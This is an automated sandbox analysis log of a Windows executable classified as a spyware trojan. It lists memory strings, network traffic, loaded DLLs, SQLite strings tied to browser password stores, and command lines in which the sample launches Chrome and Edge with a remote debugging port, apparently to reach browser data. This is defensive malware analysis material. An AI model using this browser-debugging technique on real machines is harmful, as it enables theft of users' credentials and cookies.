Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, EBAAAFBG.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: EBAAAFBG.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_115.4.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_115.4.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_112.4.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_112.4.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_112.4.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007C4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007C4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007C4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: h4ZgewNxoj.exe, 00000000.00000003.2442399066.000000000BADD000.00000004.00000020.00020000.00000000.sdmp, FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: h4ZgewNxoj.exe, 00000000.00000003.2442399066.000000000BADD000.00000004.00000020.00020000.00000000.sdmp, FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007C4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: h4ZgewNxoj.exe, 00000000.00000003.2442399066.000000000BADD000.00000004.00000020.00020000.00000000.sdmp, FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007A5000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932

System Summary

barindex
Source: h4ZgewNxoj.exe Static PE information: section name:
Source: h4ZgewNxoj.exe Static PE information: section name: .idata
Source: h4ZgewNxoj.exe Static PE information: section name:
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C53B700
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C53B8C0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C53B910
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C4DF280
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4D35A0 0_2_6C4D35A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C54545C 0_2_6C54545C
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E5440 0_2_6C4E5440
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C515C10 0_2_6C515C10
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C522C10 0_2_6C522C10
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C54AC00 0_2_6C54AC00
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C54542B 0_2_6C54542B
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E64C0 0_2_6C4E64C0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4FD4D0 0_2_6C4FD4D0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C516CF0 0_2_6C516CF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DD4E0 0_2_6C4DD4E0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E6C80 0_2_6C4E6C80
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5334A0 0_2_6C5334A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53C4A0 0_2_6C53C4A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C500512 0_2_6C500512
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4EFD00 0_2_6C4EFD00
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4FED10 0_2_6C4FED10
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C510DD0 0_2_6C510DD0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5385F0 0_2_6C5385F0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C513E50 0_2_6C513E50
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4F4640 0_2_6C4F4640
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C522E4E 0_2_6C522E4E
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4F9E50 0_2_6C4F9E50
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C546E63 0_2_6C546E63
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DC670 0_2_6C4DC670
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C517E10 0_2_6C517E10
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C525600 0_2_6C525600
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C539E30 0_2_6C539E30
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5476E3 0_2_6C5476E3
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DBEF0 0_2_6C4DBEF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4EFEF0 0_2_6C4EFEF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53E680 0_2_6C53E680
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4F5E90 0_2_6C4F5E90
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C534EA0 0_2_6C534EA0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C517710 0_2_6C517710
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E9F00 0_2_6C4E9F00
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C506FF0 0_2_6C506FF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DDFE0 0_2_6C4DDFE0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5277A0 0_2_6C5277A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4F8850 0_2_6C4F8850
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4FD850 0_2_6C4FD850
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C51F070 0_2_6C51F070
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E7810 0_2_6C4E7810
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C51B820 0_2_6C51B820
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C524820 0_2_6C524820
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5450C7 0_2_6C5450C7
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4FC0E0 0_2_6C4FC0E0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5158E0 0_2_6C5158E0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5060A0 0_2_6C5060A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4FA940 0_2_6C4FA940
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C52B970 0_2_6C52B970
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C54B170 0_2_6C54B170
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4ED960 0_2_6C4ED960
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C515190 0_2_6C515190
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C532990 0_2_6C532990
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C50D9B0 0_2_6C50D9B0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DC9A0 0_2_6C4DC9A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C519A60 0_2_6C519A60
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C518AC0 0_2_6C518AC0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C51E2F0 0_2_6C51E2F0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4F1AF0 0_2_6C4F1AF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C54BA90 0_2_6C54BA90
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C542AB0 0_2_6C542AB0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4D22A0 0_2_6C4D22A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C504AA0 0_2_6C504AA0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4ECAB0 0_2_6C4ECAB0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4D5340 0_2_6C4D5340
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4EC370 0_2_6C4EC370
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C51D320 0_2_6C51D320
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5453C8 0_2_6C5453C8
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DF380 0_2_6C4DF380
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: String function: 6C5194D0 appears 90 times
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: String function: 6C50CBE8 appears 134 times
Source: h4ZgewNxoj.exe, 00000000.00000002.2473934670.000000006C562000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs h4ZgewNxoj.exe
Source: h4ZgewNxoj.exe, 00000000.00000002.2474156729.000000006C755000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs h4ZgewNxoj.exe
Source: h4ZgewNxoj.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: h4ZgewNxoj.exe Static PE information: Section: cndowtni ZLIB complexity 0.9947586949432167
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@30/57@6/6
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C537030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C537030
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\V21DG4G0.htm Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: h4ZgewNxoj.exe, 00000000.00000003.2359316515.00000000055FD000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000003.2231599583.0000000005609000.00000004.00000020.00020000.00000000.sdmp, CAEHJEBKFCAKKFIEHDBF.0.dr, JKFHIIEHIEGDHJJJKFII.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473696415.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: h4ZgewNxoj.exe Virustotal: Detection: 41%
Source: h4ZgewNxoj.exe ReversingLabs: Detection: 71%
Source: h4ZgewNxoj.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\h4ZgewNxoj.exe "C:\Users\user\Desktop\h4ZgewNxoj.exe"
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2148,i,4031852269897719072,16253759926837054816,262144 /prefetch:8
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2200,i,8281646957936742168,7994800533158010306,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2000,i,13819835944976493745,13060883091540873233,262144 /prefetch:3
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2148,i,4031852269897719072,16253759926837054816,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2200,i,8281646957936742168,7994800533158010306,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2000,i,13819835944976493745,13060883091540873233,262144 /prefetch:3 Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Section loaded: urlmon.dll Jump to behavior
